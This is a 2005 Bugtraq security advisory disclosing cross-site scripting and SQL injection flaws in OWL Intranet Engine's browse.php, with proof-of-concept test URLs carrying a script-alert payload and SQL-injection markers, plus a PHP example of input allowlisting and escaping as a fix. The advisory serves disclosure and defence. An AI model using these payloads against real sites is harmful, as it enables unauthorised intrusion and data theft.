[38041] in bugtraq


Various Vulnerabilities in OWL Intranet Engine

daemon@ATHENA.MIT.EDU (Joxean Koret)
Sat Jan 1 17:01:34 2005

From: Joxean Koret <joxeankoret@yahoo.es>
To: bugtraq@securityfocus.com, full-disclosure@lists.netsys.com,
        vuln@secunia.com
Date: Sat, 01 Jan 2005 19:52:48 +0000
Message-Id: <1104609168.17577.1.camel@nemobox>


----------------------------------------------------------------------------
               Various Vulnerabilities in OWL Intranet Engine
----------------------------------------------------------------------------

Author: Jose Antonio Coret (Joxean Koret)
Date: 2004
Location: Basque Country

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

OWL 0.7 and 0.8 - Owl is a multi user document repository (knowledgebase)
system written in PHP4 for publishing files/documents onto the web for a
corporation, small business, group of people, or just for yourself.

Web : http://owl.sourceforge.net/

---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~

A. Cross Site Scripting Vulnerabilities

A1. In the browse.php script, various parameters that are used to write the
HTML code are not verified.

	Test URLs:

http://<site-with-owl>/intranet/browse.php?sess=<replace-with-a-valid-session-id>&parent=115&expand=1'><script>alert(document.location)</script>&order=creatorid&sortposted=DESC

http://<site-with-owl>/intranet/browse.php?sess=<replace-with-a-valid-session-id>&parent=115&expand=1&order=creatorid'><script>alert(document.location)</script>&sortposted=DESC


B. SQL Injection Vulnerabilities

B1. In the browse.php script, the following parameters are vulnerable to
SQL injection attacks.

	Test URLs:

http://<site-with-owl>/intranet/browse.php?sess=<replace-with-a-valid-session-id>&parent=104[SQL%20INJECTION]&expand=1&order=creatorid&sortposted=DESC

http://<site-with-owl>/intranet/browse.php?sess=<replace-with-a-valid-session-id>&parent=104&expand=1&order=creatorid&sortposted=DESC[SQL%20INJECTION]


The fix:
~~~~~~~~

All problems are fixed in the CVS.
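
One way to validate the four query parameters from the test URLs above, added here as an illustration; it is not Owl's code or the fix committed to CVS. The column allowlist, the `files` table, the defaults and the helper names are assumptions.

```php
<?php
// Added example: hypothetical validation for the browse.php parameters named
// in the advisory. Assumed: column list, `files` table, defaults, helper names.
const SORT_COLUMNS = ['creatorid', 'name', 'modified']; // only creatorid is on the page
const SORT_DIRECTIONS = ['ASC', 'DESC'];

/** Return the parameter as a non-negative integer, or $default if it is not all digits. */
function int_param(array $q, string $key, int $default): int
{
    $v = $q[$key] ?? '';
    return (is_string($v) && ctype_digit($v)) ? (int)$v : $default;
}

/** Return the parameter only if it exactly matches one of the allowed values. */
function enum_param(array $q, string $key, array $allowed, string $default): string
{
    $v = $q[$key] ?? '';
    return (is_string($v) && in_array($v, $allowed, true)) ? $v : $default;
}

/** Escape a value for HTML text or a quoted attribute (single quotes included). */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Normalise the request into values that are safe for both the query and the page. */
function browse_params(array $q): array
{
    return [
        'parent'     => int_param($q, 'parent', 0),
        'expand'     => int_param($q, 'expand', 0),
        'order'      => enum_param($q, 'order', SORT_COLUMNS, 'creatorid'),
        'sortposted' => enum_param($q, 'sortposted', SORT_DIRECTIONS, 'DESC'),
    ];
}

// Constructed request shaped like the advisory's test URLs.
$q = ['parent' => '104 OR 1=1', 'expand' => "1'><script>alert(document.location)</script>",
      'order' => 'creatorid', 'sortposted' => 'DESC; --'];
$p = browse_params($q);

// Column names and ASC/DESC cannot be bound as placeholders, so ORDER BY is
// built only from allowlisted values; the folder id is bound as a parameter.
$sql = "SELECT id, name FROM files WHERE parent = ? ORDER BY {$p['order']} {$p['sortposted']}";
printf("%s  [bind: %d]\n", $sql, $p['parent']);
printf("<a href='browse.php?parent=%d&amp;expand=%d&amp;order=%s'>sort</a>\n",
       $p['parent'], $p['expand'], h($p['order']));
```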

Disclaimer:
~~~~~~~~~~~

The information in this advisory and any of its demonstrations is provided
"as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory.

---------------------------------------------------------------------------

Contact:
~~~~~~~~

	Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es



